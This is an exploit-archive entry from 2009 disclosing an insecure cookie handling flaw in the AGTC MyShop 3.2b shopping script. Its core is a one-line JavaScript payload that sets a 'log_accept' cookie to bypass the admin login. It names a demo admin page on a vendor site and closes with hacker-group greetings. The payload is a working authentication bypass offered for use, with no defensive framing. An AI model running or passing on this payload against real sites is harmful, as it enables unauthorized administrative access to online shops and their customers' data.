[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : AGTC MyShop 3.2 Insecure Cookie Handling Vulnerability
# Published : 2009-05-04
# Author : Mr.tro0oqy
# Previous Title : Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit
# Next Title : BluSky CMS (news_id) Remote SQL Injection Vulnerability


=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : AGTC MyShop v3.2b
[+] Site :www.websiteforsaleuk.co.uk
[+] Found by : Mr.tro0oqy  
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
Exploit:
--------
javascript:document.cookie="log_accept=correcto;path=/";

Demo :
------
http://www.websiteforsaleuk.co.uk/demo/admin.php


=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
ThE g0bL!N - spyboy - red virus - virus_hima

all my Friends

# www.Syue.com [2009-05-04]